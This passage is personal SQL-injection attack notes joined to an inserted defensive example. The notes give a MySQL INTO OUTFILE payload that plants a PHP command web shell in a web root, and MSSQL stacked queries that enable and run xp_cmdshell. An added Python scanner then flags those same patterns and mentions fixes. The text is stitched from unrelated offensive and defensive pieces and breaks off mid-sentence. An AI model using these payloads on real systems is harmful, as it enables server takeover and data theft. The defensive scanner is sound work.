Depending on database try shells
Enumerate databases
Enumerate tables
Enumerate columns
money
Do this if it's an unknown CMS and you see a parameter that the user can type. You need to get better at this, Fabian.
##MYSQL##
' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/command.php' -- -'
or
##MSSQL##
';exec master..xp_cmdshell 'whoami'; --
Try enabling it like:
';EXEC sp_configure 'show advanced options', 1; --
';RECONFIGURE; --
';EXEC sp_configure 'xp_cmdshell', 1; --
';RECONFIGURE; --
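Defender-side view of the payloads above, as an added example that is not part of the original notes: a small scanner that normalizes a request query string (nested URL encoding, inline comments) and flags the `INTO OUTFILE`, `xp_cmdshell` and `sp_configure` patterns. The rule names, function names and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are hypothetical; the patterns mirror the payloads in these notes.
RULES = {
    "mysql_union_into_outfile": re.compile(
        r"\bunion\b.+\bselect\b.+\binto\s+outfile\b", re.I | re.S),
    "mssql_xp_cmdshell_exec": re.compile(
        r"\bexec(?:ute)?\s+(?:master\.\.)?xp_cmdshell\b", re.I),
    "mssql_sp_configure_enable": re.compile(
        r"\bsp_configure\s+'(?:show advanced options|xp_cmdshell)'\s*,\s*1\b", re.I),
}

def normalize(raw: str) -> str:
    """Undo nested URL encoding, drop /* */ comments, collapse whitespace."""
    text = raw
    for _ in range(3):                      # bounded: handles double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def scan(query_string: str) -> list[str]:
    """Return the names of all rules that match the normalized query string."""
    text = normalize(query_string)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed sample query strings (not real traffic).
SAMPLES = [
    "id=1%27%20UNION%20SELECT%20(%22x%22)%20INTO%20OUTFILE%20%27C:/xampp/htdocs/x.php%27%20--%20-",
    "id=1%27;exec%20master..xp_cmdshell%20%27whoami%27;--",
    "id=1%2527%253BEXEC%2520sp_configure%2520%2527xp_cmdshell%2527%252C%25201%253B--",
    "id=1';exec/**/master..xp_cmdshell/**/'whoami';--",
    "q=union+select+committee&page=2",      # benign: keywords only
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(scan(s) or "clean", "<-", s)
```

Request-log matching like this is a tripwire, not the fix: parameterized queries close the injection, and MySQL's `secure_file_priv` setting and SQL Server's default-disabled `xp_cmdshell` limit what a successful injection can reach.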
Here is a great resource for SQL injection: